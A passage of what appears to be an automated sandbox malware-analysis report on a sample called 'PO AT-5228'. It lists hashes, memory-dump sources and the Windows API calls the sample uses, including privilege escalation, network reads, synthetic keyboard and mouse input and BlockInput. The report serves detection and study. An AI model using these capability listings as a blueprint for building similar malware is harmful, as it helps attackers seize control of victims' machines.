                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Proc$LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2749884682-0
                                                                                        • Opcode ID: 997278147d99cfeb8955a683d7f3373a5450cb0cb22ba8dd5f07ec9b732fb3cf
                                                                                        • Instruction ID: 138a211812c2d65562acd21c73e7a9a970ab1033b0ad754ae93b2538e313b898
                                                                                        • Opcode Fuzzy Hash: 997278147d99cfeb8955a683d7f3373a5450cb0cb22ba8dd5f07ec9b732fb3cf
                                                                                        • Instruction Fuzzy Hash: ADA16760115005BADB287B295CC8FBF6DDDEB55344B14C1DEF83ADA682EB14DC01DA72
                                                                                        APIs
                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00BB43BF,00000000), ref: 00BB4FA6
                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00BB4FD2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 599397726-0
                                                                                        • Opcode ID: a442b593a95b677f8f6722b6150f78ee616c12cc6204a6a97ea4b7baedd90a9a
                                                                                        • Instruction ID: b047379f32bd4fd1707ae150415373af4fa00615515e7a6202a956ea66fe4fee
                                                                                        • Opcode Fuzzy Hash: a442b593a95b677f8f6722b6150f78ee616c12cc6204a6a97ea4b7baedd90a9a
                                                                                        • Instruction Fuzzy Hash: 1141B171504609BFEB219A84D881FFF77ECFB40754F1040AAF609A7182DBF19E4196A0
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00BAE20D
                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00BAE267
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00BAE2B4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                        • String ID:
                                                                                        • API String ID: 1682464887-0
                                                                                        • Opcode ID: 36c54a48ee947a7d5ff9be6fedb8ddd77232bc47a208de40cc542404d10501e8
                                                                                        • Instruction ID: 93f0a2793f807f1a1f270af77677abf370d986b6428c16e8a05f879ea2ea0db4
                                                                                        • Opcode Fuzzy Hash: 36c54a48ee947a7d5ff9be6fedb8ddd77232bc47a208de40cc542404d10501e8
                                                                                        • Instruction Fuzzy Hash: 10213A75A00218EFDB00EFA5D885AADBBF8FF49310F0484A9E945AB351DB31D905CB50
                                                                                        APIs
                                                                                          • Part of subcall function 00B7F4EA: std::exception::exception.LIBCMT ref: 00B7F51E
                                                                                          • Part of subcall function 00B7F4EA: __CxxThrowException@8.LIBCMT ref: 00B7F533
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B9B180
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B9B1AD
                                                                                        • GetLastError.KERNEL32 ref: 00B9B1BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1922334811-0
                                                                                        • Opcode ID: 9f21f0caf5e95bb20417957feef7b9bfb9a29d3cbbe836f5484e3fc12e35f1db
                                                                                        • Instruction ID: 3ea0d817aadf95b28d2322a69ec609338a11f4188f8d68bf4df9de6d33438728
                                                                                        • Opcode Fuzzy Hash: 9f21f0caf5e95bb20417957feef7b9bfb9a29d3cbbe836f5484e3fc12e35f1db
                                                                                        • Instruction Fuzzy Hash: D611CEB2410205AFE718AF64EDC5D2BB7FDFF44310B20856EE05AA7241DBB0FC418A64
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00BA66AF
                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00BA66EC
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00BA66F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                        • String ID:
                                                                                        • API String ID: 33631002-0
                                                                                        • Opcode ID: dfd9c881b46fb977f32bd3c364bd90de128068ec9ab2b2f6d6cdda113d61f1df
                                                                                        • Instruction ID: f3475b6f9ec052da5f2d03d8c044c4f062930cd58a70fa18b1dc0fe5c89c0818
                                                                                        • Opcode Fuzzy Hash: dfd9c881b46fb977f32bd3c364bd90de128068ec9ab2b2f6d6cdda113d61f1df
                                                                                        • Instruction Fuzzy Hash: 6311A1B2D11228BEE7118BA8DC85FAFBBFCEB09714F004596F901E7190C2B49E0487A5
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00BA7223
                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00BA723A
                                                                                        • FreeSid.ADVAPI32(?), ref: 00BA724A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID:
                                                                                        • API String ID: 3429775523-0
                                                                                        • Opcode ID: 5e485ce7cdf5b0877f3c6225645491e358f48475345bb660843d0f0a77b8665d
                                                                                        • Instruction ID: 480f40cafe683d4a141c1c62c6eaa4ff95de28c1b4114b9593fa389816a65f70
                                                                                        • Opcode Fuzzy Hash: 5e485ce7cdf5b0877f3c6225645491e358f48475345bb660843d0f0a77b8665d
                                                                                        • Instruction Fuzzy Hash: 3DF01D76A44309BFDF04DFE4DD99AEEBBBCEF08301F104469A612E7591E6749A448B10
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00BAF599
                                                                                        • FindClose.KERNEL32(00000000), ref: 00BAF5C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: e3b1b9a368d6f1d87851da05c017228be88d3acc0fe313705b575a42a7bb6503
                                                                                        • Instruction ID: 2627d1b1802f562a1632b65609418bf3399012fd680e5cde35c23426b764c7c0
                                                                                        • Opcode Fuzzy Hash: e3b1b9a368d6f1d87851da05c017228be88d3acc0fe313705b575a42a7bb6503
                                                                                        • Instruction Fuzzy Hash: CC11C4316042009FDB10EF68D885A2EB7E9FF95324F00895EF8A9DB391CF70AD018B81
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00BBBE6A,?,?,00000000,?), ref: 00BACEA7
                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00BBBE6A,?,?,00000000,?), ref: 00BACEB9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFormatLastMessage
                                                                                        • String ID:
                                                                                        • API String ID: 3479602957-0
                                                                                        • Opcode ID: 69e430145dfbf61508511a4d0b1f75df574b680cef7f6dc0c4e6db2ab8ee0468
                                                                                        • Instruction ID: edca591faabf0cd9cd69384c35e25fc634423718cf3738900e646ebe2b10b86a
                                                                                        • Opcode Fuzzy Hash: 69e430145dfbf61508511a4d0b1f75df574b680cef7f6dc0c4e6db2ab8ee0468
                                                                                        • Instruction Fuzzy Hash: 17F08231104229EBDB10ABA4DC89FFA77ADFF09351F0081A5F915D6191D670AA40CBA1
                                                                                        APIs
                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00BA4153
                                                                                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00BA4166
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: InputSendkeybd_event
                                                                                        • String ID:
                                                                                        • API String ID: 3536248340-0
                                                                                        • Opcode ID: 60016db24eb7f0c88eec20b3bcf2beadd1401ddfa856fa50b5e7a88210d56101
                                                                                        • Instruction ID: 7160300bc763a0794f5d7a13b954d9de730ebfbb2d4d1c48b460c2fc0bcfa8d6
                                                                                        • Opcode Fuzzy Hash: 60016db24eb7f0c88eec20b3bcf2beadd1401ddfa856fa50b5e7a88210d56101
                                                                                        • Instruction Fuzzy Hash: F9F06D7080438DAFDB058FA0C845BBE7FB0EF10305F008449F965AA191D7B986129FA0
                                                                                        APIs
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B9ACC0), ref: 00B9AB99
                                                                                        • CloseHandle.KERNEL32(?,?,00B9ACC0), ref: 00B9ABAB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                        • String ID:
                                                                                        • API String ID: 81990902-0
                                                                                        • Opcode ID: dce243a35ac12cc4fd94096d53decd296668a4ef5770ec8a3547e48602985ec6
                                                                                        • Instruction ID: 4e475b3aa6a30ed4b92ece451cb173dc8048360d23c872c4384c35f6b11070d3
                                                                                        • Opcode Fuzzy Hash: dce243a35ac12cc4fd94096d53decd296668a4ef5770ec8a3547e48602985ec6
                                                                                        • Instruction Fuzzy Hash: 63E0E671000511AFE7252F54EC05D7777EAEF04321710C869F45A86471DB625C90DB55
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00B86DB3,-0000031A,?,?,00000001), ref: 00B881B1
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B881BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: 95adf92edb19c2a8b379b3c0d4d08007d11ecf28dad3dc544917c4d79c6d37be
                                                                                        • Instruction ID: 208007718896f0c6e15a22a7691d5d1c82d2783f56084b235d6dfa45ffefebba
                                                                                        • Opcode Fuzzy Hash: 95adf92edb19c2a8b379b3c0d4d08007d11ecf28dad3dc544917c4d79c6d37be
                                                                                        • Instruction Fuzzy Hash: 1FB09232144648ABDB002BA1EC49B597F68EB08652F004010F60D4A0A18FB354108A9A
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: d99c5cfdd03591a8029450e62a433dc952f61944dd66c884dc7c0b8efc7775ea
                                                                                        • Instruction ID: ac43ffdc99d72e9f15f08067a4177806c965d37cd014e21e4dce649980b5efd0
                                                                                        • Opcode Fuzzy Hash: d99c5cfdd03591a8029450e62a433dc952f61944dd66c884dc7c0b8efc7775ea
                                                                                        • Instruction Fuzzy Hash: D7A23971A04259CFDB24CF59C4806ADBBF1FF48314F2581AAE859AB391DB349E81DF90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 231d44a031892fb3364d8ddfa6272c1d5d32db532411165b9b4af6db6516803f
                                                                                        • Instruction ID: 83c499c2e4b56d168345e0fc395484b66e31d293eabd415474c9a9cdf41e8b47
                                                                                        • Opcode Fuzzy Hash: 231d44a031892fb3364d8ddfa6272c1d5d32db532411165b9b4af6db6516803f
                                                                                        • Instruction Fuzzy Hash: 7F320621D29F414DD7236634C862335A399EFB73D4F15D767E819B69A6EF29C8838200
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 674341424-0
                                                                                        • Opcode ID: 31e134210624526f87f58a822ea35d2644e49c2a791467e1ff2b4e3735ad62a7
                                                                                        • Instruction ID: 14edc63126d442152b5a8e8eb54e225290a66d1f4195761d65a8bd4ad9b13e00
                                                                                        • Opcode Fuzzy Hash: 31e134210624526f87f58a822ea35d2644e49c2a791467e1ff2b4e3735ad62a7
                                                                                        • Instruction Fuzzy Hash: 6F229C716083019FD724DF14C891B6FBBE8EF84710F1449AEF89A97291EB75E944CB82
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fabd2fd8d1d9b8c520cd669a8d99f6973b46eef8726b25f4e3256487fdc33906
                                                                                        • Instruction ID: 6e4a161a123a45838dc849a32fb444bfa80051a33c41d5dbb2fd764b1873cd97
                                                                                        • Opcode Fuzzy Hash: fabd2fd8d1d9b8c520cd669a8d99f6973b46eef8726b25f4e3256487fdc33906
                                                                                        • Instruction Fuzzy Hash: 61B1D320D2AF414DD62396398871336BA9CAFBB2D5F92D717FD1676D22EF2185838180
                                                                                        APIs
                                                                                        • __time64.LIBCMT ref: 00BAB6DF
                                                                                          • Part of subcall function 00B8344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00BABDC3,00000000,?,?,?,?,00BABF70,00000000,?), ref: 00B83453
                                                                                          • Part of subcall function 00B8344A: __aulldiv.LIBCMT ref: 00B83473
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                                        • String ID:
                                                                                        • API String ID: 2893107130-0
                                                                                        • Opcode ID: d3f03c28bfc676d1a7c90a656e345e6c536520b06ae26477a612ebf914f29d64
                                                                                        • Instruction ID: 19ee1d31b6d7e7fdfae09a5578d4589e009e697775e96dada3d6720161d68265
                                                                                        • Opcode Fuzzy Hash: d3f03c28bfc676d1a7c90a656e345e6c536520b06ae26477a612ebf914f29d64
                                                                                        • Instruction Fuzzy Hash: CF2172726345108BC729CF28C491B96B7E1EB95310B248E7DE4E5CB2D1CB78BA06DB54
                                                                                        APIs
                                                                                        • BlockInput.USER32(00000001), ref: 00BB6ACA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: BlockInput
                                                                                        • String ID:
                                                                                        • API String ID: 3456056419-0
                                                                                        • Opcode ID: 4eb64ae49f78f1914c133464183a57a86343254cc484046824a9df97e30cc9c2
                                                                                        • Instruction ID: 34f424afcfe1fea166fc0dd0c080a1a77bf6c99af5fbd2dbcd4f533a429507a9
                                                                                        • Opcode Fuzzy Hash: 4eb64ae49f78f1914c133464183a57a86343254cc484046824a9df97e30cc9c2
                                                                                        • Instruction Fuzzy Hash: 49E012353102046FD700EB69D844996B7ECEF74751F04C456E945D7261DAF4E8048B90
                                                                                        APIs
                                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00BA74DE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: mouse_event
                                                                                        • String ID:
                                                                                        • API String ID: 2434400541-0
